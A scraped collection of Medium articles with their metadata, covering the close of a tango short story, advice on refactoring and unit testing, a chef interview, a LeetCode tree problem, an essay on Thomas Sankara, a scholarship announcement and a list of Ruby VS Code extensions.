“Oh, you two, don’t act so surprised,” said Yvette. “Before I settle down with Herman, I plan to go on a pilgrimage alone. I’m leaving next week for the Andes. There’s a shaman in Cordoba I want to meet and a woman in Buenos Aires, Maria Jose, who reads our moon moods. Naturally, the Mecca of Tango is a must. Herman will wait for me.”
“You better go move your car,” said Dr. N.
Yvette turned to leave, then looked back. “I know it’s corny but there’s no other way to say it. I have seen the Light.”
When she was gone, Dr. O yawned, then said, “When you were in Death Valley did the wind sift the dunes or the dunes move the wind?”
“Well said, Dr. O, well said. Shall we dance?”
“Yes, do you want to be the dune or the wind, today?”
“Mmm…I see the mirage of a Tango Moment.”
“OASIS.” | https://medium.com/nomudnolotus-writer/the-optimal-arousal-of-bennie-and-yvette-a-love-story-f15c72c6289e | ['Camille Cusumano'] | 2020-03-20 21:00:08.255000+00:00 | ['Tango', 'Short Story', 'Fiction', 'Psychotherapy', 'Writing'] |
How Should We Prepare to Refactor Our Code? | Photo by Mimi Thian on Unsplash
Programs are always changing as new requirements come in. Unless we replace it with something completely new, the code is always going to be worked on.
In this article, we’ll look at how we can prepare to refactor our code so that we can rework it to make maintenance easier.
When Should We Refactor?
Refactoring is something we may have to do when we change code to meet new requirements.
If things can’t be merged together cleanly, or anything looks wrong, then we have to change the code to make it right.
Duplication is something that we should eliminate in our code. If anything violates the DRY principle, then we should clean it up.
Nonorthogonal code should also be changed so that it’s orthogonal. Being able to change code without breaking other parts of the system is critical.
Any outdated code should also be updated. If there’s dead code, then we should remove it. Code that meets outdated requirements also has to be updated to meet the new ones.
If the performance requirements aren’t met anymore, then we have to move the functionality from one area of a system to another to improve performance.
Real-World Complications
We may not have time to refactor now. But if we don’t do it now, then we’re just compounding the problems with our code and we’ll run into problems later.
We’ve got to explain this to stakeholders so that we’re given the time to refactor our code.
If we wait longer, the problems that arise from not refactoring will get worse.
Refactor Early, Refactor Often
Therefore, we should refactor whenever we need to do it.
Refactoring is all about redesigning our existing code. Anything that the team designed can be redesigned in light of new facts, deeper understanding, changing requirements, and anything else that arises.
It’s something that needs to be undertaken slowly, deliberately and carefully.
We shouldn’t try to refactor and add functionality at the same time.
Good tests should be in place before refactoring so that we can make sure that our refactoring didn’t break anything.
Some IDEs can do simple refactoring for us automatically like cleaning up unused imports, so we may want to take advantage of that.
Also, we should take small, deliberate steps when we’re refactoring. For instance, we move one field from one class to another.
Then we test and do the next step.
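As an illustration, here is one such small, self-contained step, sketched in Python. The `Order` class and `discounted_total` helper are invented for this example: the inline discount logic is extracted into a helper without changing behavior, so the existing tests can be re-run before the next step is taken.

```python
# Hypothetical example of one small refactoring step.
# Before: Order computed its discount inline inside total().
# After: the logic is extracted into a helper, behavior unchanged,
# so it can be tested (and later reused) on its own.

def discounted_total(subtotal, is_member):
    """Extracted helper: the old inline discount logic, unchanged."""
    return subtotal * 0.9 if is_member else subtotal

class Order:
    def __init__(self, subtotal, is_member=False):
        self.subtotal = subtotal
        self.is_member = is_member

    def total(self):
        # Identical result to the pre-refactoring version; we re-run
        # the test suite after this single step before doing more.
        return discounted_total(self.subtotal, self.is_member)
```

After this one step passes the tests, we commit and move on to the next small change.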
Code That’s Easy to Test
Code that’s easy to test will make our lives a lot easier.
Our code needs to be tested before it’s released to the public.
We can make our code easy to test by writing code that’s easy to write unit tests for.
A unit test establishes some kind of artificial environment in which to exercise our code.
It checks that our code returns the results that we expect by calling it with a given input.
Then we can assemble all of those unit tests together and run them as a suite.
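A minimal sketch of this idea, using Python’s standard `unittest` module (the `slugify` function is a made-up example, not from the original post):

```python
import unittest

# Hypothetical function under test.
def slugify(title):
    """Turn 'Hello World!' into 'hello-world'."""
    cleaned = "".join(c if c.isalnum() or c == " " else "" for c in title)
    return "-".join(cleaned.lower().split())

class SlugifyTest(unittest.TestCase):
    def test_basic(self):
        self.assertEqual(slugify("Hello World!"), "hello-world")

    def test_collapses_spaces(self):
        self.assertEqual(slugify("  A   B "), "a-b")

# Individual unit tests are collected into a suite and run together.
suite = unittest.defaultTestLoader.loadTestsFromTestCase(SlugifyTest)
result = unittest.TextTestRunner(verbosity=0).run(suite)
```

The same loader can gather test cases from many modules, so the whole project’s tests run as one suite.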
Testing Against Contract
We have to write test cases to make sure that a given unit honors its contract. The tests tell us whether the code meets the contract and whether the contract means what we think it means.
We want to test that modules deliver the functionality they promise by checking them against a wide range of test cases and boundary conditions.
Therefore, to test any function comprehensively, we have to test it against a few kinds of cases.
We can pass in some invalid arguments and ensure that they’re rejected.
Also, we have to pass in some boundary values and ensure that the results are correct.
Then we pass in some ordinary valid arguments and ensure that the results are still correct.
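Those three kinds of checks can be sketched against a small, hypothetical function (the `percentile` helper below is invented for illustration; its contract is a non-empty list and 0 ≤ p ≤ 100):

```python
def percentile(data, p):
    """Return the value at the p-th percentile of data (nearest-rank style)."""
    if not data:
        raise ValueError("data must be non-empty")
    if not 0 <= p <= 100:
        raise ValueError("p must be between 0 and 100")
    ordered = sorted(data)
    index = round((p / 100) * (len(ordered) - 1))
    return ordered[index]

# 1. Invalid arguments are rejected.
try:
    percentile([], 50)
    raise AssertionError("expected ValueError")
except ValueError:
    pass

# 2. Boundary values give correct results.
assert percentile([3, 1, 2], 0) == 1
assert percentile([3, 1, 2], 100) == 3

# 3. Ordinary valid arguments give correct results.
assert percentile([3, 1, 2], 50) == 2
```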
However, most modules depend on other modules. This means that we have to do more work to write our tests.
Our tests would exercise the submodules that the current module depends on first, and then test the behavior of the module itself.
With comprehensive test coverage, we avoid lots of issues that we’ll miss if we don’t have enough tests.
Conclusion
We should write testable code so that we can run tests to make sure that we didn’t break anything when we’re refactoring.
Refactoring is important because requirements change, so we have to change our code and make sure that everything still works after we’ve changed it.
Feeding Ourselves: Eliza Martin | GP Interview #24 | Eliza and Brian romance some asparagus out at Hot Springs Ranch in Nevada
Our friend Eliza Martin is a chef, educator and speaker on topics related to personal empowerment through confidence in the kitchen. She imagines a society where nearly anyone can work with any simple ingredients to provide themselves and loved ones with healthy and delicious meals.
After working her way up the restaurant chain from line cook to Executive Chef in NYC, Chicago, and San Francisco, and serving on the Rachael Ray Show and at Saveur Magazine, Eliza became a “Chopped” Champion and won a James Beard competition.
Trained in a wide range of cuisines, from Italian, to Indian to Creole, Eliza has a gift for improvisation and engaging the beginner, from 4 to 80+ years old. Today she serves as an instructor at Culinary Artistas in San Francisco’s Ghirardelli Square neighborhood.
Culinary Artistas Kitchen near Ghirardelli Square
GP: So you care a lot about kids, food and their ability to prepare food for themselves. How does this empower kids? What is it like teaching kids in the midst of a pandemic?
EM: Children are incredibly resilient and ease into change incredibly well, often better than adults. But they are also fragile and at times need extra care. Kids are grateful for, but a little nervous about, reentry into tiny amounts of social interactions.
In many ways, children mirror or reproduce their families’ struggles right now. If there was tension at home, it would manifest in each child’s mood, behavior, and distraction. Cooking, I hope (and believe) was their outlet, a way to bring focus and creative confidence.
GP: How have things shifted in your teaching? You used to have 30 kids at a time, age 4 to 10, kind of a happy anarchy. Now you have essentially quarantined pods of 12 kids at a time. What is this like for them? What are they teaching you?
EM: The kiddos I’m hanging out with sometimes have emotional breakdowns halfway through our three weeks together. They were releasing pent up angst! Using their hands, getting VISCERAL learning, getting a little bit of a “taste” of normalcy, and a huge new sense of empowerment by FEEDING themselves.
GP: There are kinesthetic theories of learning, that when we involve our hands and move our bodies, we retain and internalize new knowledge better. What has been your experience here? What is your goal for enriching these kids lives?
EM: Marrying action to a process really helps kids to understand the WHY. They aren’t just watching food get crafted. They physically measure, mix, chop and stir their way to dish completion. Through this process, they understand why the food they crafted looks and tastes the way it does.
There is a huge sense of pride that results from crafting a dish “all by yourself,” and an enormous amount of more adventurous tasting that results. This applies to adults as well.
Alice Waters, image courtesy of Wikipedia
GP: Tell us a little bit about your relationship with farmers and food producers. Who are some of the local people you admire most and what do you admire about them?
EM: Alice. Freaking. Waters. She is a gem. Teach a man to fish.
GP: What have you seen in terms of food security for people in the midst of this economic crisis? How can the community of chefs help to support food security for people who may be in danger of going hungry?
EM: To be frank, I think at the moment chefs are in danger of being directly affected by the economic crisis. If we had an organizing force (OH HI RAMAN), we may be able to make some real difference in the form of a soup kitchen. We might even be capable of calling on the corporate bay clans to be a part of a BOGO (Buy One Give One): buy a ticket to an event, give a meal to a family…..just brainstorming here….
GP: How do you think the food and hospitality industries will change as a result of all of these crises? What kind of world will chefs and kitchen staff be walking into on the tail end of this pandemic? Are there any silver linings in how eating together will change?
EM: I feel desperately worried for my line cook friends. They have a very specific, tremendously useful skillset that is essential to restaurant service. But so many of those doors have closed.
I will say for the average person stuck at home, food has become a roller coaster. At first everyone wanted to be pro sour-dough makers. Then cooking started to become a burden, a bit redundant. Kitchen fatigue is a thing.
My hope is that folks challenge themselves to try a few new things during those ruts.
I also hope that because people are at home more than ever, meal time might become more of a sacred practice; truly the one thing we can control in these desperate times is what we eat. If we can turn it into a meditation…or at least a conscious one framed by gratitude, that might allow our brains a bit of quiet and some interaction with loved ones.
GP: In a world where so much feels out of our control, is food an area of potential autonomy, the one variable where we have power? Tell us a little about The Yoga of Eating and your hopes for the sacredness of mealtimes.
EM: Feeding ourselves and each other is an act of love. When we can create meal time with that in mind, it’s powerful. We nourish our bodies every time we eat. Truly maternal care.
GP: How are you and Brian holding up? Who gives you feelings of solidarity and who brings you hope? Is all of this social isolation ironically an opportunity to build community and a feeling that we have one another’s backs?
EM: My partner, Brian is a rock. He’s steadfast, stable, and we are fortunate enough to both have successful jobs.
Brian has been an example of care for me. Small tasks like doing the laundry and cleaning dishes go a real long way these days. Connection is so important right now. It’s amazing how much gratitude we can feel for such little moments these days.
Vanessa Silva, founder of Culinary Artistas
GP: Tell us a little about Vanessa Silva and your work at Culinary Artistas? How are you also supporting college students these days?
EM: I’ve been partnering with colleges to run Instagram takeovers and special classes for college students. It’s my mission to get young adults cooking for themselves, alone or for friends. I’m starting to work on virtual keynotes at colleges, and homecoming events with family cook-alongs! :) | https://medium.com/good-people-dinners/feeding-ourselves-eliza-martin-gp-interview-24-5219f2ebce9b | ['Raman Frey'] | 2020-09-23 16:46:08.841000+00:00 | ['Teaching', 'Learning', 'Chefs', 'Food', 'Interview'] |
623. Add One Row to Tree | LeetCode level medium question involving BFS and binary trees
Given the root of a binary tree, a value v and a depth d , you need to add a row of nodes with value v at the given depth d . The root node is at depth 1.
The adding rule is: given a positive integer depth d , for each non-null tree node N at depth d-1 , create two tree nodes with value v as N's left subtree root and right subtree root. N's original left subtree should be the left subtree of the new left subtree root, and its original right subtree should be the right subtree of the new right subtree root. If depth d is 1, there is no depth d-1 at all; in that case, create a tree node with value v as the new root of the whole original tree, and make the original tree the new root's left subtree.
Example 1:
Input:
A binary tree as following:

       4
     /   \
    2     6
   / \   /
  3   1 5

v = 1
d = 2

Output:

       4
     /   \
    1     1
   /       \
  2         6
 / \       /
3   1     5
Example 2:
Input:
A binary tree as following:

    4
   /
  2
 / \
3   1

v = 1
d = 3

Output:

     4
    /
   2
  / \
 1   1
/     \
3      1
Note:
The given d is in range [1, maximum depth of the given tree + 1]. The given binary tree has at least one tree node.
Result:
Success. Runtime: 0 ms, faster than 100.00% of Java online submissions for Add One Row to Tree. Memory Usage: 38.6 MB, less than 87.71% of Java online submissions for Add One Row to Tree.
Solution: | https://medium.com/@jesus-patinoflores/623-add-one-row-to-tree-727f39e89fa1 | ['Jesus Pf'] | 2020-12-10 18:15:44.011000+00:00 | ['Leetcode', 'Software', 'Interview', 'Bfs', 'Facebook Interview'] |
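The post's own solution code (a Java submission, per the stats above) is not included in this extract. As a stand-in, here is a sketch of one common approach, written in Python for brevity: breadth-first search down to depth d-1, then splice the new row in at that level.

```python
from collections import deque

class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right

def add_one_row(root, v, d):
    # Special case from the problem statement: a new root whose
    # left child is the entire original tree.
    if d == 1:
        return TreeNode(v, left=root)

    # BFS until the queue holds every node at depth d-1.
    queue = deque([root])
    depth = 1
    while queue and depth < d - 1:
        for _ in range(len(queue)):
            node = queue.popleft()
            if node.left:
                queue.append(node.left)
            if node.right:
                queue.append(node.right)
        depth += 1

    # Splice in the new row: each depth d-1 node gets two new
    # children with value v, keeping the old subtrees on the
    # matching sides.
    for node in queue:
        node.left = TreeNode(v, left=node.left)
        node.right = TreeNode(v, right=node.right)
    return root
```

Each node is visited at most once, so this runs in O(n) time and O(w) extra space, where w is the widest level visited.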
Thomas Sankara — Pan-Africanist and Marxist Revolutionary | “While revolutionaries as individuals can be murdered, you cannot kill ideas.” — Thomas Sankara
“Debt is a cleverly managed reconquest of Africa. It is a reconquest that turns each one of us into a financial slave.” — Thomas Sankara
Thomas Sankara and the Revolutionary Birth of Burkina Faso
by Mamadou Diallo (https://www.viewpointmag.com/2018/02/01/thomas-sankara-revolutionary-birth-burkina-faso/)
In 1983, 23 years after its independence and the succession of several neo-colonial regimes, the Upper Volta was one of the most materially destitute countries in the world. 98 percent of its population was illiterate and its GDP per capita was just over 100 dollars at the time. Out of the seven million inhabitants of the country, six million belonged to the peasantry. This peasantry had to subsist on difficult soils, faced rampant desertification, and the degradation of the terms of the cotton trade, the young nation’s main source of currency. Since its constitution as a colony within French West Africa in 1919, the Upper Volta was a disenfranchised territory, considered by the colonial apparatus to be a reserve of forced labor and agricultural workers for the great coffee and cocoa plantations of neighboring Côte d’Ivoire. Health and education equipment, even for the very low standards of the region, remained particularly scarce and inadequate to satisfy the needs of a growing population.
Sankara, the Shaping of a Political Subject
Thomas Isidore Noël Sankara, the son of a soldier of the colonial army turned civil servant, grew up, in the course of his father’s assignments in the countryside, in contact with the people but shielded from its misery. There was, though, a moment in his childhood that shows the young Sankara’s inclination to rebellion and sensitivity to social justice. But mostly, he was a conscientious boy who, according to his biographers, demonstrated a precocious seriousness in his studies. In 1966, the year that saw Maurice Yaméogo, Upper Volta’s first president, ousted by a coup and replaced by a military régime, the young Thomas was admitted to the military academy of Kadiogo in the suburbs of the capital Ouagadougou. It is there that he met Adama Abdoulaye Touré, the establishment’s director of studies and member of the Parti Africain de l’Indépendance who gathered some of his students for informal political discussions, after school hours. It was probably there that the young Thomas Sankara started his ideological training and first heard of imperialism.
After graduating from high school in 1969, Sankara was one of the three students of the academy to be offered a scholarship and the possibility to continue his studies in Madagascar. He would go on to stay four years on the island where he would be deeply affected by the 1972 Malagasy Revolution, considered by some to be its “second independence.” In Madagascar, Sankara paid special attention to the role of the army in the socio-economic development of the country. When he returned to Upper Volta with the rank of officer, he was given the command of a training camp and became known for both his rigor and unorthodox ideas, one of which being his belief in the importance of civic and intellectual training of the recruits.
When Revolution Is the Reasonable Course of Action
Thomas Sankara’s Revolution is often dismissed with the argument that it was the result of a military coup rather than the outcome of a popular movement. The argument suggests that because it was born out of the will of just a few radical putschists, it had no real substance and roots in Voltaïque society and history. Such a presentation of the Revolution, which only focuses on the military manoeuvres of August 4, 1983, is superficial and fails to take into account two essential conditions: (1) the international and national context from which the Revolution arose; and (2) the legitimacy that Thomas Sankara acquired in the years before the Revolution.
(1) Thomas Sankara and his allies did not take state power in a context of institutional stability, but rather in a climate of chronic instability and endless succession of regimes themselves established by putsches. Each of these ephemeral regimes — which was born out of the unpopularity of its predecessor — proved incapable of solving its social crisis, removing Upper Volta from the orbit of France, and freeing its economy from dependence on aid and fluctuations in world cotton prices. The international context of the early 1980s imposed on oil-importing countries in Africa such as Upper Volta several external shocks: rising oil prices; rising interest rates of the American Federal Reserve Bank, on which debt was indexed; continuously deteriorating terms of trade; and, the slowing of international trade due to the global recession. The Sankarist Revolution was in that context the peak of a series of revolts, the breakdown of an inept cycle, and the beginning of a historical sequence that would see Upper Volta become Burkina Faso and, to deal with its critical situation, “dare to invent the future.” 5
(2) To present the Sankarist Revolution as just another coup, one of the many that took place in postcolonial Africa and often with backing from imperialist states, is also to ignore the thread of events that constituted Thomas Sankara’s life as an officer in the Upper Volta army prior to the night of August 4, 1983 and conferred on him both popularity and political legitimacy. Three years before the Revolution, on November 25, 1980, a group of senior army officers led by Colonel Saye Zerbo instigated a coup and seized power on the pretext of an “erosion of state authority.” Although not part of the plot, Thomas Sankara who was well known by the public because of his progressive ideas and a feat of arms during the border conflict of 1974 with Mali, was offered a position in the new government. He politely declined at first, but because of the president’s insistence, he was compelled to accept with the condition that he would stay in office for no more than two months.
He was appointed to his first political charge in September of 1981 as Minister of Information and it took time for the inhabitants of Ouagadougou to get used to seeing a member of government going to work on his bicycle. The information Ministry, which until then was rather that of propaganda, changed radically in its relations with the media when Sankara took its lead. He encouraged journalists who were not accustomed to freedom, to write pieces on corruption cases. Articles were soon published that documented cases of embezzlement in a public bank and which suggested the complicity of civil servants from the Ministry of Trade. The police summoned the director of the National News Agency and accused him of feeding that information to the press. Sankara, as Minister of information, defended the press, reaffirmed its mission and freedom to inform the public, protesting to the Minister of the Interior.
As government popularity was falling apart, the trade union movements were being repressed, and their leaders imprisoned, Thomas Sankara resigned resoundingly: he sent an open letter to President Zerbo denouncing the régime, which he decried as bourgeois and serving the interests of the minority. He was immediately stripped of his rank of captain and deported to a remote military camp. Another coup occurred on November 7, 1982, without the participation of Sankara and his left-wing comrades of the army who believed that a movement led only by the army would not allow for the deep political changes to which they aspired.
Acknowledging his popularity, an extraordinary assembly of the CSP (Council for the Salvation of the People) presided by Captain Jean Baptiste Ouedraogo, appointed Captain Sankara Prime Minister of Upper Volta on January 10, 1983. From then on, when Sankara began diplomatic functions with an official visit to Tripoli and an attendance of the Non-Aligned Summit in New Delhi where he met with Fidel Castro, neighboring Côte d’Ivoire with backing from France, started to worry about the political evolution of Upper Volta. Between March and May 1983, Sankara gave resounding speeches to mass rallies with messages and tones that made no mystery of his political leanings.
Two days after Sankara’s speech in Bobo-Dioulasso on May 14, 1983, Guy Penne, Mitterand’s adviser for Africa, arrived in Upper Volta for an official visit. Early in the morning that followed on May 17, armored vehicles encircled the residence of Thomas Sankara, effectively placing him under house arrest. In the days that followed, great demonstrations flared up in Ouagadougou, where the slogan “Free Sankara!” rang out. Popular demonstrations, as well as a faction of the army loyal to Sankara, compelled the authorities to release him. For two months, the political situation remained unresolved, each of the camps paranoid and consolidating its positions. Sankara and the left wing of the army strengthened their ties with civilian populations and trade union organizations, and set up a political platform.
Captain Blaise Compaoré, a friend and long-time comrade of Thomas Sankara, then took the rumor of an attempt to assassinate the latter as a pretext to move with troops on Ouagadougou in the afternoon of August 4, 1983. Civilian groups supported the operation by cutting electricity in the capital. By 9:30 p.m., Compaoré’s troops controlled the capital. At 10:00 p.m. Thomas Sankara announced via radio the fall of the government of Ouedraogo and the beginning of a revolutionary process, the formation of the National Council of the Revolution, and called for the creation of revolutionary committees in all the localities of the country. He announced that night on the radio that the purpose of the government would henceforth be to help the people achieve their “deep aspiration for freedom, true independence, economic and social progress.” Upper Volta, the colonial invention, then gave way to Burkina Faso, the land of the Upright Man.
Whose Revolution?
“No altar, no belief, no holy book, neither the Qur’an nor the Bible nor the others, have ever been able to reconcile the rich and the poor, the exploiter and the exploited. And if Jesus himself had to take the whip to chase them from his temple, it is indeed because that is the only language they hear.” — Thomas Sankara
Marxism has occupied a prominent place in the theoretical arsenal of intellectuals and political figures who have led struggles for African independence. Few, however, are those among the intellectuals and African heads of state who have not felt the need to expunge from Marxism a dimension that is essential to it: class struggle. Two factors at least seem to explain this rejection of class struggle as the engine of history.
One is the class position of the leaders of decolonization, recruited either from the chieftaincy — which was either established or fundamentally transformed during colonialism by the powerful technology of indirect rule — or, more often, from among the petty-bourgeois intellectuals. Although these two groups are significantly different when it comes to culture, they are natural and complementary allies in the field of class politics as they both are products of and essential cogs in the machine of imperialist domination over their society’s productive forces. While petty-bourgeois intellectuals use their acquired skillsets to manage the postcolonial state and negotiate the terms of its extraversion, customary chiefs and religious authorities organize the participation of the masses. Decolonization, for these two groups, does not mean a rupture with the colonialist state and its capitalists, but greater and more profitable negotiation potential.
A second set of reasons for the rejection of class struggle, and thus of Marxist thought, results from a desire for cultural and epistemological independence. African-descended intellectuals have long addressed themselves to the psychic effects of post-Enlightenment thought’s negation of Black reason. Marxism’s historico-cultural specificity, rooted in 19th-century Europe, has alienated many African thinkers who long for an authentically African sociological and political thought, which would owe everything to African minds and nothing to European ones. This, I think, has to do with a wounded pride and a tendency to idealize African societies before and during the Atlantic slave trade. In a lecture given in 1975 in New York, Walter Rodney takes Kwame Nkrumah as the paradigmatic figure of this tendency to avoid the reality of class struggle, though he qualifies that Ghana’s first president was not simply a bourgeois ideologue. From the 1950s to the end of his life, Nkrumah — a sincere and devoted revolutionary, statesman, and thinker — sought to develop an emancipatory consciousness while denying the importance of class contradictions in African societies. Chased from power by the CIA-allied Ghanaian petty bourgeoisie, whose non-existence as a class he had been busy theorizing, he finally produced a theoretical reflection which was at the same time an exercise in self-criticism while exiled in the Guinea of fellow anti-imperialist Sékou Touré.
With Thomas Sankara, who is of a different generation from that of Nkrumah and Senghor, there is no such ambiguity or escapism when it comes to dealing with class: the enemies of the anti-imperialist struggle are the bourgeoisie and its allies, from the north and the south; the struggle’s own allies and prime beneficiaries are the working masses and, in a country like Burkina Faso, the peasantry most specifically.
When asked about the substance of his economic program, Sankara replied that it was for the Revolution to use the brains and arms of the Burkinabe, or people of Burkina Faso, to guarantee two meals a day and ten liters of water to all. One suspects that this goal, at once sublime and modest, did not excite the bourgeoisie. But the Burkinabè Revolution would achieve this aim over the course of four years, all the while being weaned off the budgetary assistance of France, the World Bank (which ceased immediately after the Revolution of 1983), and several other sources of financing promised to prior liberal regimes. Sankara’s sober class analysis is, in my opinion, one of the most valuable and unique aspects of his legacy for the African present. It is on the basis of this analysis that he was able to formulate and implement policies of redistribution.
Debt as a Hindrance to Sovereignty
When Sankara took power four years before his speech at the meeting of the Organization of African Unity, debt strangled not only the countries of Africa, but also those of Latin America. In 1985, out of a budget of 58 billion CFA francs, Burkina Faso had to devote 12 billion to debt repayments. The speech of Thomas Sankara, as well as his call for a united front against debt, is directly connected to the campaign launched by Fidel Castro in Havana in 1985. This campaign and his speech, which emphasized the odious nature of the debt, its colonial origins, its disastrous effects on public and social policies in particular, and the insolvency of debtors, do not, however, exhaust all the grievances Thomas Sankara harbored against the institution of debt.
Thomas Sankara was critical of both debt and aid, which was partly composed of loans. On the latter, he said: “We certainly encourage help that helps us to do without aid. But in general, the policy of assistance and aid has only disorganized us, enslaving us, disempowering us in our economic, political and cultural space.” This critique of aid is not simply made at the level of discourse; it is embedded in practical decisions. In 1987, he told one of his biographers, Ernest Harsch, that he suggested the United States replace the Peace Corps program in Burkina Faso with budgetary support. When the United States refused, Sankara promptly suspended the program. Sankara, although at the head of a very poor country and isolated by his ideological options, showed a rare strength of character and remarkable intransigence on the question of the sovereignty of his country. His speech at the UN in 1984 included this strong profession: “We swear, we proclaim, that from now on in Burkina Faso, nothing will happen without the participation of the Burkinabè. Nothing that wasn’t previously decided by us, elaborated by us. There will no longer be an attack on our decency and our dignity.”
This concern for autonomy, the preservation of the Revolution’s freedom of thought and action, had, as we have seen, the consequence of cutting Burkina Faso off from several sources of financing. But Sankara was eager to act, to solve the hardships of his people, and to do so quickly. He therefore imposed severe austerity, without any need for IMF injunctions. He drastically cut the running costs of the administration, abolished the bonuses of civil servants, and reduced to a minimum the lifestyle of his government. What was saved from those budgetary cuts was invested in education, health and agriculture programs in rural areas. To get an idea of the lengths to which this austerity went, let us remember that during his trip to the UN in New York, his delegation, which included ministers, was lodged on mattresses lying on the floor of Burkina Faso’s embassy. Official journeys and missions of State officials were only made in economy class.
Institutional and Cultural Failures of the Revolution
This austerity, a sort of ascetic policy, together with the scale of the efforts required of the Burkinabè and a certain authoritarianism, ended up displeasing or fatiguing even sections of the population that were otherwise favorable to the Revolution. Despite undeniable results from the point of view of health, food, and education, the Revolution in its last years alienated many Burkinabè, especially the most privileged ones. One should also note that although he was critical of parliamentarism and what he termed bourgeois democracy, Sankara failed to create a viable institutional alternative to it.
He also overestimated his fellow countrymen’s capacity for selflessness and revolutionary ardor. The Revolution created a series of institutions, implemented in all regions of the country, to replace feudal chieftaincies and channel popular participation into the country’s socio-economic development as well as into the judicial system. These were the electorally constituted CDRs (Committees for the Defense of the Revolution) and the TPRs (Popular Revolutionary Courts). Conceived as two-way communication channels between the people and the revolutionary leadership and as institutions of direct democracy, the CDRs quickly became a vehicle for opportunistic elites. Because the central authority lacked effective means of surveillance and coercion, the CDRs committed numerous abuses of power and displayed reactionary tendencies. One should also note that the speeches, radio and television shows, newspapers, and most of the régime’s other vehicles of communication relied on French, a language that the overwhelming majority of the people, those whose interests the Revolution was serving, did not understand. Because of these cultural and institutional failures, vast segments of the peasantry remained oblivious to the Revolution’s values, arguments for change, and long-term objectives.
A Lingering Thorn in Imperialism’s Side
On October 15, 1987, while Thomas Sankara was leading a work meeting in the Conseil de l’entente, shots rang out in the courtyard. According to the sole survivor of that meeting, Alouna Touré, Sankara asked those present to stay in the room and told them: “It is me that they are looking for.” He headed towards the door, lifting his hands as he exited the room. Armed men, commanded by Captain Gilbert Diendéré, a relative of Blaise Compaoré, fired on him without warning. The revolutionary process was tragically cut short. Compaoré, once a friend and ally, seized power and reinserted Burkina Faso into France’s sphere of influence. The country was once again on good terms with the World Bank and the IMF, as Blaise Compaoré slowly transformed it into a pillar of Françafrique.
When, in 2014, the Burkinabe youth, invoking the memory of Sankara, forced Compaoré to leave power, he was offered the leadership of an international organization by President Hollande and eventually went into exile in Abidjan, Côte d’Ivoire. The court system and the people of Burkina Faso are today asking for his extradition so that he can be questioned in the investigation of the death of Thomas Sankara, the circumstances of which have never been fully established.
Thomas Sankara was 37 years old when he was assassinated, and his comrades, the group of people that led the revolution, were all in their 30s. Thirty years have passed, and progressives on the continent and abroad still celebrate his memory every October 15th. He is one of the compasses that gives direction, one of the giants on whose shoulders militants can climb to see farther and reach higher. When I think of the harsh conditions humankind is made to suffer in a country such as Upper Volta in the 1980s, I can’t help but think of the flourishing of Thomas Sankara, the nurturing by his people of such a magnificent spirit, as an extremely eloquent testimony to universal human potential and resilience. | https://medium.com/refuse-to-cooperate/thomas-sankara-pan-africanist-and-marxist-revolutionary-20dcbef781ad | ['Kent Allen Halliburton'] | 2018-09-28 00:49:36.267000+00:00 | ['Politics', 'Communism', 'Africa', 'History', 'SEO']
Incoming SITA Student Awarded Prestigious Scholarship | Incoming SITA Student Awarded Prestigious Scholarship
and how you can too!
Min Kyo Jeong, 2016 Benjamin A. Gilman International Scholarship recipient
Looking for financial resources to support your semester abroad? We have a list of scholarships to start your search.
Bowdoin College Student Min Kyo Jeong awarded U.S. Department of State’s Benjamin A. Gilman International Scholarship to study abroad.
July 15, 2016 — Min Kyo (Michelle) Jeong, a sociology student at Bowdoin College, is one of over 850 American undergraduate students from 324 colleges and universities across the U.S. selected to receive the prestigious Benjamin A. Gilman International Scholarship, sponsored by the U.S. Department of State’s Bureau of Educational and Cultural Affairs, to study or intern abroad during the fall 2015 term or the 2015–2016 academic year. Michelle will study abroad in Madurai, India with South India Term Abroad.
Gilman scholars receive up to $5,000 to apply towards their study abroad or internship program costs. The program aims to diversify the students who study and intern abroad and the countries and regions where they go. Students receiving a Federal Pell Grant from two- and four-year institutions who will be studying abroad or participating in a career-oriented international internship for academic credit are eligible to apply. Scholarship recipients have the opportunity to gain a better understanding of other cultures, countries, languages, and economies — making them better prepared to assume leadership roles within government and the private sector.
Congressman Gilman, who retired in 2002 after serving in the House of Representatives for 30 years and chairing the House Foreign Relations Committee, commented, “Study abroad is a special experience for every student who participates. Living and learning in a vastly different environment of another nation not only exposes our students to alternate views, but also adds an enriching social and cultural experience. It also provides our students with the opportunity to return home with a deeper understanding of their place in the world, encouraging them to be a contributor, rather than a spectator in the international community.”
The program is administered by the Institute of International Education (IIE). The full list of students who have been selected to receive Gilman Scholarships, including students’ home state, university and host country, is available on their website: www.iie.org/gilman. According to Allan Goodman, President and CEO of IIE, “International education is one of the best tools for developing mutual understanding and building connections between people from different countries. It is critical to the success of American diplomacy and business, and the lasting ties that Americans make during their international studies are important to our country in times of conflict as well as times of peace.”
* * * * * * * *
The U.S. Department of State, Bureau of Educational and Cultural Affairs’ (ECA) mission is to increase mutual understanding between the people of the United States and the people of other countries by means of educational and cultural exchange that assists in the development of peaceful relations. In an effort to reflect the diversity of the United States and global society, ECA programs, funding, and other activities encourage the involvement of American and international participants from traditionally underrepresented groups, including women, racial and ethnic minorities, and people with disabilities. Artists, educators, athletes, students, youth and rising leaders in the United States and more than 160 countries around the globe participate in academic, cultural, sports, and professional exchanges. For more information about ECA programs, initiatives, and achievements, visit http://eca.state.gov.
The Institute of International Education (IIE) is the world leader in the international exchange of people and ideas. An independent, nonprofit organization founded in 1919, the Institute is the world’s most experienced global higher education and professional exchange organization. IIE has a network of 19 offices worldwide working with more than 1,200 member institutions and over 6,000 individuals with a commitment to the internationalization of their institutions. IIE designs and implements programs of study and training for students, educators, young professionals and trainees from all sectors with funding from government and private sources. These programs include the Fulbright and Humphrey Fellowships administered for the U.S. Department of State. The Institute is a resource for educators and institutions worldwide (http://www.iie.org), publishing the Open Doors Report and operating www.IIEPassport.org and www.studyabroadfunding.org search engines for study abroad programs and study abroad scholarships. For more information, please contact Lindsay Calvert, Director, Gilman International Scholarship, at 832–369–3481 or lcalvert@iie.org.
Follow SITA on Instagram, Facebook, Twitter, and YouTube. Learn more and apply at sitaprogram.org. | https://medium.com/sita-blog/study-abroad-scholarship-resources-cb0c2657760f | ['South India Term Abroad'] | 2016-08-08 19:34:47.739000+00:00 | ['India', 'Funding', 'Study Abroad', 'Education', 'Scholarship'] |
VS Code Extensions for Ruby on Rails Developers | Ruby
This speaks for itself. Ruby syntax highlighting.
Intelligent code completion and documentation while you’re writing code.
Be wise and never forget to close the end immediately.
Useful shortcuts to save you time.
Get quick insight on the defined database schema while you’re typing.
